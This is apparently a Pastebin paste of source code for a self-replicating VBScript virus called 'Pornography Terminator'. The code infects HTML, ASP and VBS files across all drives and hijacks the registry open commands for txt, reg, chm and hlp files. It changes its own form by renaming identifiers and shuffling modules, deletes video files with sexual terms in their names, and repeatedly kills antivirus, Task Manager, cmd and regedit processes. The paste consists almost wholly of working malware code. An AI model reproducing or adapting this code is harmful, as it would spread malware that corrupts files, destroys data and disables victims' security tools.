FlyFar

HJLMR - VBS Pornography Terminator Virus Source Code

Mar 6th, 2023 (edited)
189
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VBScript 36.63 KB | Cybersecurity | 0 0
  1. 'Administrator4
  2. 'HJLMRRQRWYOZX2_25
  3. Sub DeleteReg(strkey)
  4.     Dim tmps
  5.     Set tmps = CreateObject("WScript.Shell")
  6.     tmps.RegDelete strkey
  7.     Set tmps = Nothing
  8. End Sub
  9. Function ReadReg(strkey)
  10.     Dim tmps
  11.     Set tmps = CreateObject("WScript.Shell")
  12.     ReadReg = tmps.RegRead(strkey)
  13.     Set tmps = Nothing
  14. End Function
  15. Sub WriteReg(strkey, Value, vtype)
  16.     Dim tmps
  17.     Set tmps = CreateObject("WScript.Shell")
  18.     If vtype = "" Then
  19.         tmps.RegWrite strkey, Value
  20.     Else
  21.         tmps.RegWrite strkey, Value, vtype
  22.     End If
  23.     Set tmps = Nothing
  24. End Sub
  25. 'WQKAULMNKKG2_25
  26. 'HJLMRRQRWYOZX2_21
  27. Function IsSexFile(fname)
  28.     IsSexFile = False
  29.     If InStr(fname, "成人")>0 Or InStr(fname, "淫")>0 Or InStr(fname, "偷拍")>0 Or _
  30.                 InStr(fname, "偷窥")>0 Or InStr(fname, "口交")>0 Or InStr(fname, "强奸")>0 Or _
  31.                 InStr(fname, "轮奸")>0 Or InStr(fname, "伦理片")>0 Or InStr(fname, "自摸")>0 Then
  32.         IsSexFile = True
  33.     End If
  34. End Function
  35. Function Isinfected(buffer, ftype)
  36.     Isinfected = True
  37.     Select Case ftype
  38.         Case "hta", "htm" , "html" , "asp", "vbs"
  39.             If InStr(buffer, Head_V) = 0 Then
  40.                 Isinfected = False
  41.             End If
  42.         Case Else
  43.             Isinfected = True
  44.     End Select
  45. End Function
  46. 'WQKAULMNKKG2_21
  47. 'HJLMRRQRWYOZX2_22
  48. Function GetSFolder(p)
  49.     Dim objfso
  50.     Set objfso = CreateObject(GetFSOName())
  51.     GetSFolder = objfso.GetSpecialFolder(p) & "\"
  52.     Set objfso = Nothing
  53. End Function
  54. Function GetUserName()
  55.     On Error Resume Next
  56.     Dim Value , UserName
  57.     Value = "HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C}\Username"
  58.     UserName = ReadReg(Value)
  59.     If UserName = "" Then
  60.         GetUserName = "Administrator"
  61.     Else
  62.         GetUserName = UserName
  63.     End If
  64. End Function
  65. Function GetFSOName()
  66.     On Error Resume Next
  67.     Dim Value , UserName
  68.     Value = "HKEY_CLASSES_ROOT\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\ProgID\"
  69.     UserName = ReadReg(Value)
  70.     If UserName = "" Then
  71.         GetUserName = "Scripting.FileSystemObject"
  72.     Else
  73.         GetFSOName = UserName
  74.     End If
  75. End Function
  76. Function GetHeadTail(l)
  77.     Dim Str , buffer
  78.     If l = 0 Then
  79.         GetHeadTail = "'" & GetUserName()
  80.     Else
  81.         buffer = GetUserName()
  82.         Str = ""
  83.         For i = 1 To Len(buffer)
  84.             Str = Mid(buffer, i, 1) & Str
  85.             GetHeadTail = "'" & Str
  86.         Next
  87.     End If
  88. End Function
  89. 'WQKAULMNKKG2_22
  90. 'HJLMRRQRWYOZX1_9
  91. Function ChangeModelOrder(vbsCode, Num_DNA)
  92.     On Error Resume Next
  93.     Dim DNA(), Array_vbsCode()
  94.     Dim i, Value, flag, j, buffer
  95.     ReDim DNA(Num_DNA), Array_vbsCode(Num_DNA)
  96.     buffer = vbsCode
  97.     Randomize
  98.     For i = 1 To Num_DNA
  99.         Do
  100.             Value = Int((Num_DNA * Rnd) + 1)
  101.             flag = 1
  102.             For j = 1 To Num_DNA
  103.                 If Value = DNA(j) Then
  104.                     flag = 0
  105.                     Exit For
  106.                 End If
  107.             Next
  108.         Loop Until flag = 1
  109.         DNA(i) = Value
  110.     Next
  111.     For i = 1 To Num_DNA
  112.         Array_vbsCode(i) = GetModelCode(buffer, i)
  113.     Next
  114.     buffer = ""
  115.     For i = 1 To Num_DNA
  116.         buffer = buffer & VBCRLF & Array_vbsCode(DNA(i)) & VBCRLF
  117.     Next
  118.     ChangeModelOrder = Head_V & Version & VBCRLF & buffer & VBCRLF & Tail_V
  119. End Function
  120. 'WQKAULMNKKG1_9
  121. 'HJLMRRQRWYOZX2_26
  122. Sub Run(ExeFullName)
  123.     Dim WshShell
  124.     Set WshShell = WScript.CreateObject("WScript.Shell")
  125.     WshShell.Run ExeFullName
  126.     Set WshShell = Nothing
  127. End Sub
  128. Sub CopyFile(objfso, code, pathf)
  129.     On Error Resume Next
  130.     Dim vf
  131.     Set vf = objfso.OpenTextFile(pathf, 2, true)
  132.     vf.Write code
  133. End Sub
  134. Function ChangeName(vbsCode, Names)
  135.     Dim Name, j, temp, buffer
  136.     buffer = vbsCode
  137.     Randomize
  138.     For Each Name in Names
  139.         temp = ""
  140.         For j = 1 To Len(Name)
  141.             temp = temp & Chr((Int(Rnd * 26) + 65))
  142.         Next
  143.         buffer = Replace(buffer, Name, temp)
  144.     Next
  145.     ChangeName = buffer
  146. End Function
  147. 'WQKAULMNKKG2_26
  148. 'HJLMRRQRWYOZX2_16
  149. Sub SetTxtFileAss(sFilePath)
  150.     On Error Resume Next
  151.     Dim Value
  152.     Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
  153.     Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\", Value, "REG_EXPAND_SZ")
  154. End Sub
  155. Sub SethlpFileAss(sFilePath)
  156.     On Error Resume Next
  157.     Dim Value
  158.     Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
  159.     Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\", Value, "REG_EXPAND_SZ")
  160. End Sub
  161. Sub SetRegFileAss(sFilePath)
  162.     On Error Resume Next
  163.     Dim Value
  164.     Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
  165.     Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\", Value, "REG_EXPAND_SZ")
  166. End Sub
  167. Sub SetchmFileAss(sFilePath)
  168.     On Error Resume Next
  169.     Dim Value
  170.     Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
  171.     Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\", Value, "REG_EXPAND_SZ")
  172. End Sub
  173. 'WQKAULMNKKG2_16
  174. 'HJLMRRQRWYOZX2_12
  175. Sub InfectHead(strPath, fi, objfso, VbsCode_WebPage, VbsCode_Victim, ftype, T)
  176.     On Error Resume Next
  177.     Dim tso, buffer, strCode , Maxsize
  178.     Maxsize = 350000
  179.     If fi.Size< Maxsize Then
  180.         Set tso = objfso.OpenTextFile(strPath, 1, True)
  181.         buffer = tso.ReadAll()
  182.         tso.Close
  183.         If T = 0 Then
  184.             Select Case ftype
  185.                 Case "hta", "htm", "html", "asp"
  186.                     If Isinfected(buffer, ftype) = False Then
  187.                         Set tso = objfso.OpenTextFile(strPath, 2, true)
  188.                         strCode = MakeScript(VbsCode_WebPage, 0)
  189.                         tso.Write strCode & VBCRLF & buffer
  190.                         Cnt = Cnt + 1
  191.                     End If
  192.                 Case "vbs"
  193.                     If Isinfected(buffer, ftype) = False Then
  194.                         n = InStr(buffer , "Option Explicit")
  195.                         If n<>0 Then
  196.                             buffer = Replace(buffer, "Option Explicit", "", 1, 1, 1)
  197.                             Set tso = objfso.OpenTextFile(strPath, 2, true)
  198.                             tso.Write vbsCode_Victim & VBCRLF & buffer
  199.                             Cnt = Cnt + 1
  200.                         Else
  201.                             Set tso = objfso.OpenTextFile(strPath, 2, true)
  202.                             tso.Write vbsCode_Victim & VBCRLF & buffer
  203.                             Cnt = Cnt + 1
  204.                         End If
  205.                     End If
  206.                 Case Else
  207.                     '
  208.                    '
  209.            End Select
  210.         ElseIf T = 1 Then
  211.             If Isinfected(buffer, ftype) = True Then
  212.                 n = InStrRev(buffer , Tail_V)
  213.                 If n<>0 Then
  214.                     buffer = Replace(buffer, Tail_V, "", n, 1, 1)
  215.                     Set tso = objfso.OpenTextFile(strPath, 2, True)
  216.                     tso.Write strCode & VBCRLF & buffer
  217.                 End If
  218.             End If
  219.         End If
  220.     End If
  221. End Sub
  222. 'WQKAULMNKKG2_12
  223. 'HJLMRRQRWYOZX2_17
  224. Function PreInstance()
  225.     On Error Resume Next
  226.     Dim num_cnt
  227.     Dim strComputer, objWMIService, colProcessList, objProcess
  228.     num_cnt = 0
  229.     PreInstance = False
  230.     strComputer = "."
  231.     Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
  232.     Set colProcessList = objWMIService.ExecQuery("Select * from Win32_Process Where " & "Name = 'cscript.exe' or Name = 'wscript.exe'")
  233.     For Each objProcess in colProcessList
  234.         If InStr(CStr(objProcess.CommandLine), WScript.ScriptFullName)>0 Then
  235.             num_cnt = num_cnt + 1
  236.         End If
  237.     Next
  238.     If num_cnt>= 2 Then
  239.         PreInstance = True
  240.     End If
  241. End Function
  242. 'WQKAULMNKKG2_17
  243. 'HJLMRRQRWYOZX1_8
  244. Sub RestoreSystem(objfso)
  245.     On Error Resume Next
  246.     Dim Value, dc, d, HCULoad
  247.     Call SafeSet()
  248.     HCULoad = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load"
  249.     If ReadReg(HCULoad) = FullPath_V1 Then
  250.         Call DeleteReg(HCULoad)
  251.     End If
  252.     Value = "%SystemRoot%\system32\NOTEPAD.EXE %1"
  253.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\")<>Value Then
  254.         Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\", Value, "REG_EXPAND_SZ")
  255.     End If
  256.     Value = "regedit.exe " & """%1"""
  257.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\")<>Value Then
  258.         Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\", Value, "REG_EXPAND_SZ")
  259.     End If
  260.     Value = GetSFolder(1) & "hh.exe " & """%1"""
  261.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\")<>Value Then
  262.         Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\", Value, "REG_EXPAND_SZ")
  263.     End If
  264.     Value = "%SystemRoot%\system32\winhlp32.exe %1"
  265.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\")<>Value Then
  266.         Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\", Value, "REG_EXPAND_SZ")
  267.     End If
  268.     Value = """%1"" %*"
  269.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\")<>Value Then
  270.         Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\", Value, "REG_SZ")
  271.     End If
  272.     Set dc = objfso.Drives
  273.     For Each d In dc
  274.         If objfso.FileExists(d.DriveLetter & ":\" & Name_V1) = True Then
  275.             objfso.DeleteFile d.DriveLetter & ":\" & Name_V1
  276.             objfso.DeleteFile d.DriveLetter & ":\" & "AutoRun.inf"
  277.         End If
  278.     Next
  279.     If objfso.FileExists(FullPath_V1) = True Then
  280.         Set vf = objfso.GetFile(FullPath_V1)
  281.         vf.Delete
  282.     End If
  283.     If objfso.FileExists(FullPath_V0) = true Then
  284.         Set vf = objfso.GetFile(FullPath_V0)
  285.         vf.Delete
  286.     End If
  287.     If objfso.FileExists(FullPath_Config) = True Then
  288.         objfso.DeleteFile FullPath_Config , True
  289.     End If
  290. End Sub
  291. 'WQKAULMNKKG1_8
  292. 'HJLMRRQRWYOZX1_5
  293. Sub MonitorSystem(objfso, vbsCode)
  294.     On Error Resume Next
  295.     Dim ProcessNames
  296.     ProcessNames = Array("ras.exe", "360tray.exe", "taskmgr.exe", "cmd.exe", "cmd.com", "regedit.exe", "regedit.scr", "regedit.pif", "regedit.com", "msconfig.exe", "SREng.exe", "USBAntiVir.exe")
  297.     Do
  298.         Call KillProcess(ProcessNames)
  299.         Call InvadeSystem(objfso, vbsCode)
  300.         WScript.Sleep 5000
  301.     Loop
  302. End Sub
  303. 'WQKAULMNKKG1_5
  304. 'HJLMRRQRWYOZX1_4
  305. Function Head()
  306.     Head = VBCRLF & "'HJLMRRQRWYOZX1_1" & VBCRLF &_
  307.     "On Error Resume Next" & VBCRLF &_
  308.     "Dim Cnt, CntMax, Version, Name_V1, FullPath_V0, FullPath_V1, FullPath_Config,Sum_ModelCode,Head_V,Tail_V" & VBCRLF &_
  309.     "Dim ModelHead, ModelTail" & VBCRLF &_
  310.     "Cnt = 0" & VBCRLF &_
  311.     "CntMax = 1000" & VBCRLF &_
  312.     "Version = ""4""" & VBCRLF &_
  313.     "Name_V1 = GetUserName() & "".vbs""" & VBCRLF &_
  314.     "FullPath_V0 = GetSFolder(0) & Name_V1 '主要执行文件关联转向" & VBCRLF &_
  315.     "FullPath_V0 = GetSFolder(0) & Name_V1 '主要执行文件关联转向" & VBCRLF &_
  316.     "FullPath_V1 = GetSFolder(1) & Name_V1 '主要执行配置文件命令" & VBCRLF &_
  317.     "FullPath_Config= GetSFolder(1) & GetUserName() & "".ini""" & VBCRLF &_
  318.     "Sum_ModelCode = 26" & VBCRLF &_
  319.     "Head_V= GetHeadTail(0)" & VBCRLF &_
  320.     "Tail_V= GetHeadTail(1)" & VBCRLF &_
  321.     "ModelHead=""'HJLMRRQRWYOZX""" & VBCRLF &_
  322.     "ModelTail=""'WQKAULMNKKG""" & VBCRLF
  323. End Function
  324. Function VictimHead()
  325.     VictimHead = Head() & VBCRLF &_
  326.     "Call VictimMain()" & VBCRLF &_
  327.     "Sub VictimMain()" & VBCRLF &_
  328.     "   Call ExeVbs_Victim()" & VBCRLF &_
  329.     "End Sub" & VBCRLF &_
  330.     "'WQKAULMNKKG1_1" & VBCRLF
  331. End Function
  332. Function <span class="searchlite">Virus</span>Head()
  333.     <span class="searchlite">Virus</span>Head = Head() & VBCRLF &_
  334.     "Call <span class="searchlite">Virus</span>Main()" & VBCRLF &_
  335.     "Sub <span class="searchlite">Virus</span>Main()" & VBCRLF &_
  336.     "   On Error Resume Next" & VBCRLF &_
  337.     "   Call ExeVbs_<span class="searchlite">Virus</span>()" & VBCRLF &_
  338.     "End Sub" & VBCRLF & VBCRLF &_
  339.     "'WQKAULMNKKG1_1" & VBCRLF
  340. End Function
  341. Function WebHead()
  342.     WebHead = Head() & VBCRLF &_
  343.     "Call WebMain()" & VBCRLF &_
  344.     "Sub WebMain()" & VBCRLF &_
  345.     "   On Error Resume Next" & VBCRLF &_
  346.     "   Call ExeVbs_WebPage()" & VBCRLF &_
  347.     "End Sub" & VBCRLF &_
  348.     "'WQKAULMNKKG1_1" & VBCRLF
  349. End Function
  350. 'WQKAULMNKKG1_4
  351. 'HJLMRRQRWYOZX2_20
  352. Function GetModelCode(vbsCode, N_ModelCode)
  353.     On Error Resume Next
  354.     Dim n, n1, buffer
  355.     buffer = vbsCode
  356.     If N_ModelCode>= 1 And N_ModelCode<= 9 Then
  357.         n = InStr(buffer, ModelHead & "1_" & N_ModelCode)
  358.         n1 = InStr(buffer, ModelTail & "1_" & N_ModelCode)
  359.         GetModelCode = Mid(buffer, n, n1 - n + Len(ModelTail & "1_" & N_ModelCode))
  360.     ElseIf N_ModelCode>= 10 And N_ModelCode<= 99 Then
  361.         n = InStr(buffer, ModelHead & "2_" & N_ModelCode)
  362.         n1 = InStr(buffer, ModelTail & "2_" & N_ModelCode)
  363.         GetModelCode = Mid(buffer, n, n1 - n + Len(ModelTail & "2_" & N_ModelCode))
  364.     ElseIf N_ModelCode>= 100 And N_ModelCode<= 999 Then
  365.         n = InStr(buffer, ModelHead & "3_" & N_ModelCode)
  366.         n1 = InStr(buffer, ModelTail & "3_" & N_ModelCode)
  367.         GetModelCode = Mid(buffer, n, n1 - n + Len(ModelTail & "3_" & N_ModelCode))
  368.     End If
  369. End Function
  370. 'WQKAULMNKKG2_20
  371. 'HJLMRRQRWYOZX1_2
  372. Sub ExeVbs_WebPage()
  373.     On Error Resume Next
  374.     Dim objfso, vbsCode, VbsCode_Virus
  375.     Set objfso = CreateObject(GetFSOName())
  376.     vbsCode = GetScriptCode("vbscript")
  377.     VbsCode_<span class="searchlite">Virus</span> = Head_V & Version & VBCRLF & <span class="searchlite">Virus</span>Head() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
  378.     VbsCode_<span class="searchlite">Virus</span> = ChangeModelOrder(VbsCode_<span class="searchlite">Virus</span>, Sum_ModelCode)
  379.     Call InvadeSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  380.     Set objfso = Nothing
  381. End Sub
  382. Sub ExeVbs_Victim()
  383.     On Error Resume Next
  384.     Dim objfso, vbsCode, VbsCode_Virus
  385.     Set objfso = CreateObject(GetFSOName())
  386.     vbsCode = GetSelfCode(objfso, WScript.ScriptFullName)
  387.     VbsCode_<span class="searchlite">Virus</span> = Head_V & Version & VBCRLF & <span class="searchlite">Virus</span>Head() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
  388.     VbsCode_<span class="searchlite">Virus</span> = ChangeModelOrder(VbsCode_<span class="searchlite">Virus</span>, Sum_ModelCode)
  389.     Call InvadeSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  390.     Call Run(FullPath_V1)
  391.     Set objfso = Nothing
  392. End Sub
  393. 'WQKAULMNKKG1_2
  394. 'HJLMRRQRWYOZX2_11
  395. Sub SearchFile(objfso, strPath, VbsCode_WebPage, VbsCode_Victim, T)
  396.     On Error Resume Next
  397.     Dim pfo, pf, pfi, ext
  398.     Dim psfo, ps
  399.     Set pfo = objfso.GetFolder(strPath)
  400.     Set pf = pfo.Files
  401.     For Each pfi In pf
  402.         If Cnt >= CntMax Then
  403.             Exit For
  404.         End If
  405.         ext = LCase(objfso.GetExtensionName(pfi.Path))
  406.         Select Case ext
  407.             Case "hta", "htm", "html", "asp", "vbs"
  408.                 Call InfectHead(pfi.Path, pfi, objfso, VbsCode_WebPage, VbsCode_Victim, ext, T)
  409.             Case "mpg", "rmvb", "avi", "rm"
  410.                 If IsSexFile(pfi.Name) = True Then
  411.                     pfi.Delete
  412.                 End If
  413.         End Select
  414.     Next
  415.     Set psfo = pfo.SubFolders
  416.     For Each ps In psfo
  417.         If Cnt >= CntMax Then
  418.             Exit For
  419.         End If
  420.         Call SearchFile(objfso, ps.Path, VbsCode_WebPage, VbsCode_Victim, T)
  421.     Next
  422. End Sub
  423. 'WQKAULMNKKG2_11
  424. 'HJLMRRQRWYOZX2_10
  425. Sub SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, T)
  426.     On Error Resume Next
  427.     Dim d , dc
  428.     Set dc = objfso.Drives
  429.     For Each d In dc
  430.         If Cnt >= CntMax Then '
  431.            Exit For
  432.         End If
  433.         If d.DriveType = 1 Or d.DriveType = 2 Or d.DriveType = 3 Then
  434.             'If d.DriveType = 1 Then
  435.            Call SearchFile(objfso, d.Path & "\", VbsCode_WebPage, VbsCode_Victim, T)
  436.             'End If
  437.        End If
  438.     Next
  439. End Sub
  440. 'WQKAULMNKKG2_10
  441. 'HJLMRRQRWYOZX1_3
  442. Sub ExeVbs_<span class="searchlite">Virus</span>()
  443.     On Error Resume Next
  444.     Dim objfso, objshell, FullPath_Self, Name_Self, Names
  445.     Dim oArgs, ArgNum, Para_V, SubPara_V, RunPath
  446.     Dim Order, Order_Order, Order_Para
  447.     Dim vbsCode , VbsCode_<span class="searchlite">Virus</span>, VbsCode_WebPage, VbsCode_Victim , MainBody
  448.     Set objfso = CreateObject(GetFSOName())
  449.     Set objshell = CreateObject("WScript.Shell")
  450.     FullPath_Self = WScript.ScriptFullName
  451.     Name_Self = WScript.ScriptName
  452.     Names = Array("HJLMRRQRWYOZX", "WQKAULMNKKG")
  453.     Set oArgs = WScript.Arguments
  454.     ArgNum = 0
  455.     Do While ArgNum < oArgs.Count
  456.         Para_V = Para_V & " " & oArgs(ArgNum)
  457.         ArgNum = ArgNum + 1
  458.     Loop
  459.     SubPara_V = LCase(Right(Para_V, 3))
  460.     Select Case SubPara_V
  461.         Case "run"
  462.             RunPath = Left(FullPath_Self, 2)
  463.             Call Run(RunPath)
  464.             vbsCode = GetSelfCode(objfso, FullPath_Self)
  465.             VbsCode_<span class="searchlite">Virus</span> = Head_V & Version & VBCRLF & <span class="searchlite">Virus</span>Head() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
  466.             VbsCode_<span class="searchlite">Virus</span> = ChangeModelOrder(VbsCode_<span class="searchlite">Virus</span>, Sum_ModelCode)
  467.             VbsCode_<span class="searchlite">Virus</span> = ChangeName(VbsCode_<span class="searchlite">Virus</span>, Names)
  468.             Call InvadeSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  469.             Call Run(FullPath_V1)
  470.         Case "txt", "log"
  471.             RunPath = "%SystemRoot%\system32\NOTEPAD.EXE " & Para_V
  472.             Call Run(RunPath)
  473.             vbsCode = GetSelfCode(objfso, FullPath_Self)
  474.             VbsCode_<span class="searchlite">Virus</span> = Head_V & Version & VBCRLF & <span class="searchlite">Virus</span>Head() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
  475.             VbsCode_<span class="searchlite">Virus</span> = ChangeModelOrder(VbsCode_<span class="searchlite">Virus</span>, Sum_ModelCode)
  476.             VbsCode_<span class="searchlite">Virus</span> = ChangeName(VbsCode_<span class="searchlite">Virus</span>, Names)
  477.             Call InvadeSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  478.             Call Run(FullPath_V1)
  479.         Case "reg"
  480.             Para_V = "regedit.exe " & """" & Trim(Para_V) & """"
  481.             Call Run(Para_V)
  482.             vbsCode = GetSelfCode(objfso, FullPath_Self)
  483.             VbsCode_<span class="searchlite">Virus</span> = Head_V & Version & VBCRLF & <span class="searchlite">Virus</span>Head() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
  484.             VbsCode_<span class="searchlite">Virus</span> = ChangeModelOrder(VbsCode_<span class="searchlite">Virus</span>, Sum_ModelCode)
  485.             VbsCode_<span class="searchlite">Virus</span> = ChangeName(VbsCode_<span class="searchlite">Virus</span>, Names)
  486.             Call InvadeSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  487.             Call Run(FullPath_V1)
  488.         Case "chm"
  489.             Para_V = "hh.exe " & """" & Trim(Para_V) & """"
  490.             Call Run(Para_V)
  491.             vbsCode = GetSelfCode(objfso, FullPath_Self)
  492.             VbsCode_<span class="searchlite">Virus</span> = Head_V & Version & VBCRLF & <span class="searchlite">Virus</span>Head() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
  493.             VbsCode_<span class="searchlite">Virus</span> = ChangeModelOrder(VbsCode_<span class="searchlite">Virus</span>, Sum_ModelCode)
  494.             VbsCode_<span class="searchlite">Virus</span> = ChangeName(VbsCode_<span class="searchlite">Virus</span>, Names)
  495.             Call InvadeSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  496.             Call Run(FullPath_V1)
  497.         Case "hlp"
  498.             Para_V = "winhlp32.exe " & """" & Trim(Para_V) & """"
  499.             Call Run(Para_V)
  500.             vbsCode = GetSelfCode(objfso, FullPath_Self)
  501.             VbsCode_<span class="searchlite">Virus</span> = Head_V & Version & VBCRLF & <span class="searchlite">Virus</span>Head() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
  502.             VbsCode_<span class="searchlite">Virus</span> = ChangeModelOrder(VbsCode_<span class="searchlite">Virus</span>, Sum_ModelCode)
  503.             VbsCode_<span class="searchlite">Virus</span> = ChangeName(VbsCode_<span class="searchlite">Virus</span>, Names)
  504.             Call InvadeSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  505.             Call Run(FullPath_V1)
  506.         Case Else
  507.             If PreInstance = True Then
  508.                 WScript.Quit
  509.             End If
  510.             If IsOK(objfso, Date(), FullPath_Config) = False Then
  511.                 If objfso.FileExists(FullPath_Config) = True Then
  512.                     Order = Trim(ReadOK(objfso, FullPath_Config))
  513.                     Order_Order = Trim(Mid(Order, 1, InStr(1, Order, "@") -1))
  514.                     Order_Para = Trim(Mid(Order, InStr(1, Order, "@") + 1, Len(Order) - InStr(1, Order, "@")))
  515.                 End If
  516.                 Select Case Order_Order
  517.                 Case "InfectFiles"
  518.                     vbsCode = GetSelfCode(objfso, FullPath_Self)
  519.                     MainBody = GetMainBody(vbsCode, Sum_ModelCode)
  520.                     VbsCode_WebPage = Head_V & Version & VBCRLF & WebHead() & MainBody & VBCRLF & Tail_V
  521.                     VbsCode_WebPage = ChangeModelOrder(VbsCode_WebPage, Sum_ModelCode)
  522.                     VbsCode_WebPage = ChangeName(VbsCode_WebPage, Names)
  523.                     VbsCode_Victim = Head_V & Version & VBCRLF & VictimHead() & MainBody & VBCRLF & Tail_V
  524.                     VbsCode_Victim = ChangeModelOrder(VbsCode_Victim, Sum_ModelCode)
  525.                     VbsCode_Victim = ChangeName(VbsCode_Victim, Names)
  526.                     VbsCode_<span class="searchlite">Virus</span> = Head_V & Version & VBCRLF & <span class="searchlite">Virus</span>Head() & MainBody & VBCRLF & Tail_V
  527.                     VbsCode_<span class="searchlite">Virus</span> = ChangeModelOrder(VbsCode_<span class="searchlite">Virus</span>, Sum_ModelCode)
  528.                     VbsCode_<span class="searchlite">Virus</span> = ChangeName(VbsCode_<span class="searchlite">Virus</span>, Names)
  529.                     Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 0)
  530.                     Order_Para = Order_Para + Cnt
  531.                     If Order_Para>2000 Then
  532.                     VbsCode_Victim = ChangeName(VbsCode_Victim, Names)
  533.                     VbsCode_<span class="searchlite">Virus</span> = Head_V & Version & VBCRLF & <span class="searchlite">Virus</span>Head() & MainBody & VBCRLF & Tail_V
  534.                     VbsCode_<span class="searchlite">Virus</span> = ChangeModelOrder(VbsCode_<span class="searchlite">Virus</span>, Sum_ModelCode)
  535.                     VbsCode_<span class="searchlite">Virus</span> = ChangeName(VbsCode_<span class="searchlite">Virus</span>, Names)
  536.                     Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 0)
  537.                     Order_Para = Order_Para + Cnt
  538.                     If Order_Para>2000 Then
  539.                         Call WriteOK(objfso, FullPath_Config, "Msg", "您已有超过2000个文件被感染!不过请放心,此病毒很容易被清除!请联系418465*** -_- !")
  540.                     Else
  541.                         Call WriteOK(objfso, FullPath_Config, "InfectFiles", Order_Para)
  542.                     End If
  543.                     Call InvadeSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  544.                     Call MonitorSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  545.                 Case "Msg"
  546.                     MsgBox Order_Para
  547.                     Call WriteOK(objfso, FullPath_Config, "", "")
  548.                     vbsCode = GetSelfCode(objfso, FullPath_Self)
  549.                     MainBody = GetMainBody(vbsCode, Sum_ModelCode)
  550.                     VbsCode_<span class="searchlite">Virus</span> = Head_V & Version & VBCRLF & <span class="searchlite">Virus</span>Head() & MainBody & VBCRLF & Tail_V
  551.                     VbsCode_<span class="searchlite">Virus</span> = ChangeModelOrder(VbsCode_<span class="searchlite">Virus</span>, Sum_ModelCode)
  552.                     VbsCode_<span class="searchlite">Virus</span> = ChangeName(VbsCode_<span class="searchlite">Virus</span>, Names)
  553.                     Call InvadeSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  554.                     Call MonitorSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  555.                 Case "UnLoadMe"
  556.                     Call RestoreSystem(objfso)
  557.                     Wscript.Quit
  558.                 Case "Kill<span class="searchlite">Virus</span>"
  559.                     Call RestoreSystem(objfso)
  560.                     Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 1)
  561.                     Wscript.Quit
  562.                 Case Else
  563.                     vbsCode = GetSelfCode(objfso, FullPath_Self)
  564.                     MainBody = GetMainBody(vbsCode, Sum_ModelCode)
  565.                     VbsCode_WebPage = Head_V & Version & VBCRLF & WebHead() & MainBody & VBCRLF & Tail_V
  566.                     VbsCode_WebPage = ChangeModelOrder(VbsCode_WebPage, Sum_ModelCode)
  567.                     VbsCode_WebPage = ChangeName(VbsCode_WebPage, Names)
  568.                     VbsCode_Victim = Head_V & Version & VBCRLF & VictimHead() & MainBody & VBCRLF & Tail_V
  569.                     VbsCode_Victim = ChangeModelOrder(VbsCode_Victim, Sum_ModelCode)
  570.                     VbsCode_Victim = ChangeName(VbsCode_Victim, Names)
  571.                     VbsCode_<span class="searchlite">Virus</span> = Head_V & Version & VBCRLF & <span class="searchlite">Virus</span>Head() & MainBody & VBCRLF & Tail_V
  572.                     VbsCode_<span class="searchlite">Virus</span> = ChangeModelOrder(VbsCode_<span class="searchlite">Virus</span>, Sum_ModelCode)
  573.                     VbsCode_<span class="searchlite">Virus</span> = ChangeName(VbsCode_<span class="searchlite">Virus</span>, Names)
  574.                     Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 0)
  575.                     Call WriteOK(objfso, FullPath_Config, "InfectFiles", Cnt)
